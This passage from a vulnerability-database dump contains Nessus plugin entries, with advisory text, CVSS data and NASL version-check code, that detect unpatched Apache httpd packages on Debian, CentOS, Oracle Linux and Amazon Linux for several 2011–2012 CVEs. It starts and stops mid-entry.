ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2405\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version apache2 2.2.16-6+squeeze6\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"apache2\", reference:\"2.2.9-10+lenny12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-dbg\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-doc\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-utils\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-bin\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-common\", reference:\"2.2.16-6+squeeze6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:28", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-16T00:00:00", "type": "nessus", "title": "CentOS 6 : httpd (CESA-2012:0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/57960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# CentOS Errata and Security Advisory 2012:0128 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57960);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"CentOS 6 : httpd (CESA-2012:0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44f56a29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0031\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-15.el6.centos.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:30:05", "description": "From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : httpd (ELSA-2012-0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/68458", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# Oracle Linux Security Advisory ELSA-2012-0128 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68458);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2012-0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002606.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-15.0.1.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:36:40", "description": "It was discovered that the fix for CVE-2011-3368 did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)", "cvss3": {"score": null, "vector": null}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2012-46)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-46.NASL", "href": "https://www.tenable.com/plugins/nessus/69653", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-46.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69653);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_xref(name:\"ALAS\", value:\"2012-46\");\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2012-46)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = 